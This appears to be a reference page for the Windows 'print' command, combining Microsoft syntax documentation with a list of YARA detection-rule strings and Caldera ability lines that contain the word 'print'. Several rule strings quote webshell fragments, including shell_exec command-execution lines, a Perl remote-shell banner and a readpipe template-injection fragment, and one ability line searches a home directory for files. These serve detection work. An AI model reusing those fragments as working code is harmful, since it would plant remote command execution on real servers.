signature-base apt_pulsesecure.yar $s4 = “print $_” CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s6 = “print MIME::Base64::encode(RC4(“ CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $pl_socket = “socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print "$l$e$!$l” CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $msg1 = “print "$l OK! I\‘m successful connected.$l"” CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $msg2 = “print "$l OK! I\‘m accept connection.$l"” CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s0 = “print "[] Connected to remote host \n"; “ fullword ascii / PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s1 = “print "Usage: $0 [Host] [Port] \n\n"; “ fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s5 = “print "[] Resolving HostName\n"; “ fullword ascii / PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base exploit_shitrix.yar $s07 = “template.new({‘BLOCK’=’print readpipe(“ ascii /* TrustedSec templae */ CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s3 = “out.print("Hi,Man 2015
");” fullword ascii
CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s6 = “out.print("</pre>");” fullword ascii CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s7 = “out.print("<pre>");” fullword ascii CC BY-NC 4.0
signature-base gen_cn_webshells.yar $s4 = “out.print("Hi,Man 2015");” fullword ascii CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “ out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “</font><%out.print(request.getRealPath(request.getServletPath())); %>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "<form action=\"".$me."?p=cmd&dir=".realpath(‘.’)."” CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di” CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "\n".’Tip: to view the file "as is" - open the page in <a href="‘.Dx” CC BY-NC 4.0
signature-base thor-webshells.yar $s9 = “if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “out.print(") <A Style=’Color: " + fcolor.toString() + ";’ HRef=’?file=" + fn” CC BY-NC 4.0
signature-base thor-webshells.yar $s7 = “if(flist[i].canRead() == true) out.print("r" ); else out.print("-");” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam” CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “python -c"import md5;x=md5.new(‘you_password’);print x.hexdigest()"” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “print "\n".’Tip: to view the file "as is" - open the page in <a href="‘.Dx” CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "Sending mail to $to……. ";” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "Asmodeus Perl Remote Shell” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "\n".’<tr><td width=100pt class=linelisting>POST (php eval)</td><" CC BY-NC 4.0
signature-base thor-webshells.yar $s1 = “print "<tr><td>Server is:</td><td>".$_SERVER[‘SERVER_SIGNATURE’]."</td” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "<tr><td>Execute command:</td><td><input size=100 name=\"_cmd” CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print "error; help: head -n 16 d00r.py"” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “print "PW:",PW,"PORT:",PORT,"HOST:",HOST” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “print("
Provenance du mail : <input type=\"text\" name=\"provenanc”
CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “<? if($cmd != "") print Shell_Exec($cmd);?>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s8 = “print "<form action=\"".$me."?p=chmod&file=".$content."&d” CC BY-NC 4.0
signature-base thor-webshells.yar $s18 = “print shell_exec($command);” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print "
<h1>#worst @dal.net</h1>
";” fullword
CC BY-NC 4.0
signature-base thor-webshells.yar $s7 = “print "
<h1>Linux Shells</h1>
";” fullword
CC BY-NC 4.0
signature-base thor-webshells.yar $s14 = “print "<tr><td>System type:</td><td>$UName</td></tr>";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s20 = “print "Transfered $TargetFileSize Bytes.
";” fullword
CC BY-NC 4.0
signature-base thor-webshells.yar $s12 = “print "Sending mail to $to……. "; “ fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s4 = “<? if($cmd != "") print Shell_Exec($cmd);?>” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s12 = “print « "[kalabanga]";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s5 = “print "
[ Generation time: \".round(getTime()-startTime,4).\" second"
CC BY-NC 4.0
signature-base thor-webshells.yar $s6 = “print "Sorry, none of the command functions works.";” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “print("<p align=\"center\"><font size=\"5\">Exploit include “ CC BY-NC 4.0
stockpile b007fe0c-c6b0-4fda-915c-255bbc070de2.yml description: copy the contents for the clipboard and print them Apache-2.0
stockpile 6c91884e-11ec-422f-a6ed-e76774b0daac.yml - source: host.print.file Apache-2.0
stockpile 6c91884e-11ec-422f-a6ed-e76774b0daac.yml target: host.print.size Apache-2.0
stockpile 6e1a53c0-7352-4899-be35-fa7f364d5722.yml name: Print Working Directory Apache-2.0
stockpile 6e1a53c0-7352-4899-be35-fa7f364d5722.yml description: Print the current working directory on the system Apache-2.0
stockpile a41c2324-8c63-4b15-b3c5-84f920d1f226.yml command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


print

Sends a text file to a printer. A file can print in the background if you send it to a printer connected to a serial or parallel port on the local computer.

[!NOTE] You can perform many configuration tasks from the command prompt by using the Mode command, including configuring a printer connected to a parallel or a serial port, displaying printer status, or preparing a printer for code page switching.

Syntax

print [/d:<printername>] [<drive>:][<path>]<filename>[ ...]

Parameters

Parameter Description
/d:<printername> Specifies the printer that you want to print the job. To print to a locally connected printer, specify the port on your computer where the printer is connected. Valid values for parallel ports are LPT1, LPT2, and LPT3. Valid values for serial ports are COM1, COM2, COM3, and COM4. You can also specify a network printer by using its queue name (\\server_name\printer_name). If you don’t specify a printer, the print job is sent to LPT1 by default.
<drive>: Specifies the logical or physical drive where the file you want to print is located. This parameter isn’t required if the file you want to print is located on the current drive.
<path> Specifies the location of the file you want to print. This parameter isn’t required if the file you want to print is located in the current directory.
<filename>[ ...] Required. Specifies the file you want to print. You can include multiple files in one command.
/? Displays help at the command prompt.

Examples

To send the report.txt file, located in the current directory, to a printer connected to lpt2 on the local computer, type:

print /d:lpt2 report.txt

To send the report.txt file, located in the c:\accounting directory, to the printer1 print queue on the /d:\copyroom server, type:

print /d:\\copyroom\printer1 c:\accounting\report.txt

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.